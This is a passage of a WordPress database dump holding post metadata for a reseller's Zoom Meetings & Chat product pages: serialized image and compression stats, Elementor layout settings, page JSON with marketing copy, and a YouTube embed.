2;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:36:\"img-administration_9287dae-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6244,3062,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:25.0320437038788412564827012829482555389404296875;s:5:\"bytes\";i:80462;s:11:\"size_before\";i:321436;s:10:\"size_after\";i:240974;s:4:\"time\";d:0.9199999999999999289457264239899814128875732421875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.370000000000000994759830064140260219573974609375;s:5:\"bytes\";i:4007;s:11:\"size_before\";i:20690;s:10:\"size_after\";i:16683;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:14182;s:11:\"size_before\";i:60591;s:10:\"size_after\";i:46409;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.5799999999999982946974341757595539093017578125;s:5:\"bytes\";i:8467;s:11:\"size_before\";i:39227;s:10:\"size_after\";i:30760;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.370000000000000994759830064140260219573974609375;s:5:\"bytes\";i:32004;s:11:\"size_before\";i:126165;s:10:\"size_after\";i:94161;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:21802;s:11:\"size_before\";i:74763;s:10:\"size_after\";i:52961;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}}}'),(6366,3073,'_elementor_edit_mode','builder'),(6367,3073,'_elementor_template_type','post'),(6246,3063,'_wp_page_template','template-fullwidth.php'),(6247,3063,'_elementor_edit_mode','builder'),(6248,3063,'_elementor_template_type','post'),(6249,3063,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6250,3063,'_elementor_data','[{\"id\":\"417e0ba\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f0ea6b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7770038\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom Meetings &amp; Chat<\\/h2><h4>Enterprise video conferencing with real-time messaging and content sharing<\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b91aee7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f471498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"17\",\"bottom\":\"17\",\"left\":\"17\",\"isLinked\":true}},\"elements\":[{\"id\":\"ce0af90\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simplified video conferencing and messaging across any device<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f628137\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"797a5c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62dcd05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Unparalleled usability<\\/h3><p>Enable quick adoption with meeting capabilities that make it easy to start, join, and collaborate across any device.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f241128\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362c434\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Join anywhere, on any device<\\/h3><p>Zoom Meetings syncs with your calendar system and delivers streamlined enterprise-grade video conferencing from desktop and mobile.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bde0386\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1c1fd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Video for every need<\\/h3><p>Enable internal and external communications, all-hands meetings, and trainings through one communications platform.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e0b58c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"47f78d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"17\",\"bottom\":\"17\",\"left\":\"17\",\"isLinked\":true}},\"elements\":[{\"id\":\"6f1fa59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Built for modern teams<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"12b7ed2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f4f4f4\"},\"elements\":[{\"id\":\"0b0d4db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a2a9787\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>HD video and audio<\\/strong><br \\/>Bring HD video and audio to your meetings with support for up to 1000 video participants and 49 videos on screen.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5385446\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Recording and transcripts<\\/strong><br \\/>Record your meetings locally or to the cloud, with searchable transcripts.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"092d8ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3635010\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Built-in collaboration tools<\\/strong><br \\/>Multiple participants can share their screens simultaneously and co-annotate for a more interactive meeting.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c12b178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Streamlined calendaring<\\/strong><br \\/>Support scheduling or starting meetings from Outlook, Gmail, or iCal.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89047f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"542b778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Meet securely<\\/strong><br \\/>End-to-end encryption for all meetings, role-based user security, password protection, waiting rooms, and place attendee on hold.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"adfcbe7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Team Chat<\\/strong><br \\/>Chat with groups, searchable history, integrated file sharing, and 10 year archive. Easily escalate into 1:1 or group calls.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbd652f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a6e774\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7548aa4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modernize your meeting solution<\\/h3><p>Zoom Meetings for desktop and mobile provides the tools to make every meeting a great one.<\\/p><ul><li>Focus on your meeting \\u2013 click record to leave the note taking to Zoom\\u2019s auto-generated, searchable transcripts<\\/li><li>Share and play videos with full audio and video transmit without uploading the content<\\/li><li>Look meeting-ready with Virtual Backgrounds and Touch Up My Appearance<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eb82e80\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f15a247\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/zoom.png\",\"id\":3059}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a81732\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d1960a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28ec46d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/animatedGIF-mobilemeeting_ab06f03.gif\",\"id\":3060},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3f091ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1aa57e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>A thoughtful approach to mobile meetings<\\/h3><p>Today\\u2019s mobile professionals need to be able to work and video conference wherever they are. Zoom Meetings for mobile provides the same great experience that you\\u2019d expect from the desktop client and more.<\\/p><ul><li>Turn on Virtual Backgrounds and select the image of your choice (iPhone 8+ required)<\\/li><li>Share your screen and co-annotate<\\/li><li>Use Safe Driving Mode or Apple Carplay (iPhone only)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"723d9eb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8b8a582\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"9f8ba89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Zoom Chat<\\/h3><p>Integrated persistent messaging streamlines workspace collaboration across the desktop and mobile clients.<\\/p><ul><li>Create private or public groups<\\/li><li>Share files and search content<\\/li><li>Seamlessly start a meeting<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a647de6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcfdcca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/img-zoomchat_29cb256.jpg\",\"id\":3061}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"61164d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"bea2aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1a68ea5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/img-administration_9287dae.png\",\"id\":3062},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1a5813a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"53e2945\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Administration and remote assistance made easy<\\/h3><p>Centralized IT management and remote assistance simplifies deployment and support.<\\/p><ul><li>Track utilization and usage trends<\\/li><li>View version distribution<\\/li><li>Assign granular permission settings (account, group, and user level)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ef0b21\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"73fa491\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d1c0485\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6251,3063,'_elementor_version','0.4'),(6254,3064,'_wp_page_template','template-fullwidth.php'),(6255,3064,'_elementor_edit_mode','builder'),(6256,3064,'_elementor_template_type','post'),(6257,3064,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6258,3064,'_elementor_data','[{\"id\":\"417e0ba\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f0ea6b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7770038\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom Meetings &amp; Chat<\\/h2><h4>Enterprise video conferencing with real-time messaging and content sharing<\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b91aee7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f471498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"17\",\"bottom\":\"17\",\"left\":\"17\",\"isLinked\":true}},\"elements\":[{\"id\":\"ce0af90\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simplified video conferencing and messaging across any device<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f628137\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"797a5c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62dcd05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Unparalleled usability<\\/h3><p>Enable quick adoption with meeting capabilities that make it easy to start, join, and collaborate across any device.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f241128\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362c434\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Join anywhere, on any device<\\/h3><p>Zoom Meetings syncs with your calendar system and delivers streamlined enterprise-grade video conferencing from desktop and mobile.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bde0386\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1c1fd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Video for every need<\\/h3><p>Enable internal and external communications, all-hands meetings, and trainings through one communications platform.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"271c26e\",\"elType\":\"section\",\"settings\":{\"structure\":\"34\"},\"elements\":[{\"id\":\"0de1e6a\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"36cf127\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"4380a60\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/VnyitUU4DUY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"64592eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e0b58c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"47f78d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"17\",\"bottom\":\"17\",\"left\":\"17\",\"isLinked\":true}},\"elements\":[{\"id\":\"6f1fa59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Built for modern teams<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"12b7ed2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f4f4f4\"},\"elements\":[{\"id\":\"0b0d4db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a2a9787\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>HD video and audio<\\/strong><br \\/>Bring HD video and audio to your meetings with support for up to 1000 video participants and 49 videos on screen.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5385446\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Recording and transcripts<\\/strong><br \\/>Record your meetings locally or to the cloud, with searchable transcripts.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"092d8ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3635010\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Built-in collaboration tools<\\/strong><br \\/>Multiple participants can share their screens simultaneously and co-annotate for a more interactive meeting.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c12b178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Streamlined calendaring<\\/strong><br \\/>Support scheduling or starting meetings from Outlook, Gmail, or iCal.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89047f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"542b778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Meet securely<\\/strong><br \\/>End-to-end encryption for all meetings, role-based user security, password protection, waiting rooms, and place attendee on hold.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"adfcbe7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Team Chat<\\/strong><br \\/>Chat with groups, searchable history, integrated file sharing, and 10 year archive. Easily escalate into 1:1 or group calls.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbd652f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a6e774\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7548aa4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modernize your meeting solution<\\/h3><p>Zoom Meetings for desktop and mobile provides the tools to make every meeting a great one.<\\/p><ul><li>Focus on your meeting \\u2013 click record to leave the note taking to Zoom\\u2019s auto-generated, searchable transcripts<\\/li><li>Share and play videos with full audio and video transmit without uploading the content<\\/li><li>Look meeting-ready with Virtual Backgrounds and Touch Up My Appearance<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eb82e80\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f15a247\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/zoom.png\",\"id\":3059}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a81732\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d1960a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28ec46d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/animatedGIF-mobilemeeting_ab06f03.gif\",\"id\":3060},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3f091ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1aa57e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>A thoughtful approach to mobile meetings<\\/h3><p>Today\\u2019s mobile professionals need to be able to work and video conference wherever they are. Zoom Meetings for mobile provides the same great experience that you\\u2019d expect from the desktop client and more.<\\/p><ul><li>Turn on Virtual Backgrounds and select the image of your choice (iPhone 8+ required)<\\/li><li>Share your screen and co-annotate<\\/li><li>Use Safe Driving Mode or Apple Carplay (iPhone only)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"723d9eb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8b8a582\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"9f8ba89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Zoom Chat<\\/h3><p>Integrated persistent messaging streamlines workspace collaboration across the desktop and mobile clients.<\\/p><ul><li>Create private or public groups<\\/li><li>Share files and search content<\\/li><li>Seamlessly start a meeting<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a647de6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcfdcca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/img-zoomchat_29cb256.jpg\",\"id\":3061}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"61164d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"bea2aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1a68ea5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/img-administration_9287dae.png\",\"id\":3062},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1a5813a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"53e2945\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Administration and remote assistance made easy<\\/h3><p>Centralized IT management and remote assistance simplifies deployment and support.<\\/p><ul><li>Track utilization and usage trends<\\/li><li>View version distribution<\\/li><li>Assign granular permission settings (account, group, and user level)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ef0b21\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"73fa491\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d1c0485\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6259,3064,'_elementor_version','0.4'),(6262,3056,'_oembed_c17fd1ae8ca22d16b2bf501a7fd328fe','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/VnyitUU4DUY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(6263,3056,'_oembed_time_c17fd1ae8ca22d16b2bf501a7fd328fe','1552295697'),(6296,3066,'_elementor_data','[{\"id\":\"cad15a9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5c7499\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"96a0357\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom for the Conference Room<\\/h2><h3>Software-based, flawless video, integrated audio, and wireless content 